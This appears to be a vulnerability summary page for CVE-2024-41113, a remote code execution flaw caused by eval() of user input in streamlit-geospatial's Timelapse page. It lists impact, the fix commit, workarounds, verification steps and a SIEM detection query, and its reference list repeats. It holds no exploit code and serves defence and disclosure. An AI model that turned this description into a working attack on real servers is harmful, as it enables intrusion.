CVE-2024-41113
📋 TL;DR
This vulnerability in streamlit-geospatial allows remote code execution through unsafe use of the eval() function with user-controlled input. Attackers can execute arbitrary code on affected systems, potentially compromising the entire server. Users running streamlit-geospatial applications with the vulnerable Timelapse.py page are affected.
💻 Affected Systems
- streamlit-geospatial
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise allowing attackers to execute arbitrary commands, steal sensitive data, install malware, pivot to other systems, and maintain persistent access.
Likely Case
Remote code execution leading to application compromise, data exfiltration, and potential lateral movement within the network.
If Mitigated
No impact if the vulnerability is patched or proper input validation prevents malicious eval() execution.
🎯 Exploit Status
The vulnerability is straightforward to exploit as it involves direct eval() execution of user input. Public GitHub advisory includes technical details.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Commit c4f81d9616d40c60584e36abb15300853a66e489
Vendor Advisory: https://securitylab.github.com/advisories/GHSL-2024-100_GHSL-2024-108_streamlit-geospatial/
Restart Required: Yes
Instructions:
1. Update to the latest streamlit-geospatial version containing commit c4f81d9616d40c60584e36abb15300853a66e489. 2. Restart the streamlit application. 3. Verify the fix by checking that eval() is no longer used with unsanitized user input.
🔧 Temporary Workarounds
Disable Timelapse Page
allRemove or disable access to the vulnerable Timelapse.py page
mv pages/1_📷_Timelapse.py pages/1_📷_Timelapse.py.disabled
Input Validation Filter
allAdd input validation to sanitize vis_params before eval()
# Add validation in pages/1_📷_Timelapse.py around line 395
🧯 If You Can't Patch
- Implement strict network access controls to limit who can access the streamlit-geospatial application
- Deploy a web application firewall (WAF) with RCE protection rules
🔍 How to Verify
Check if Vulnerable:
Check if your streamlit-geospatial version contains the vulnerable eval() usage in pages/1_📷_Timelapse.py around line 395Check Version:
git log --oneline | grep c4f81d9616d40c60584e36abb15300853a66e489Verify Fix Applied:
Verify that commit c4f81d9616d40c60584e36abb15300853a66e489 is present in your codebase and eval() no longer processes unsanitized user input📡 Detection & Monitoring
Log Indicators:
- Unusual Python eval() errors
- Suspicious command execution in application logs
- Unexpected process spawns from streamlit
Network Indicators:
- Unusual outbound connections from streamlit process
- Data exfiltration patterns
SIEM Query:
process_name:streamlit AND (command_line:*eval* OR command_line:*python* -c*)🔗 References
- https://github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py#L383-L388
- https://github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py#L390-L393
- https://github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py#L395
- https://github.com/opengeos/streamlit-geospatial/commit/c4f81d9616d40c60584e36abb15300853a66e489
- https://securitylab.github.com/advisories/GHSL-2024-100_GHSL-2024-108_streamlit-geospatial/
- https://github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py#L383-L388
- https://github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py#L390-L393
- https://github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py#L395
- https://github.com/opengeos/streamlit-geospatial/commit/c4f81d9616d40c60584e36abb15300853a66e489
- https://securitylab.github.com/advisories/GHSL-2024-100_GHSL-2024-108_streamlit-geospatial/
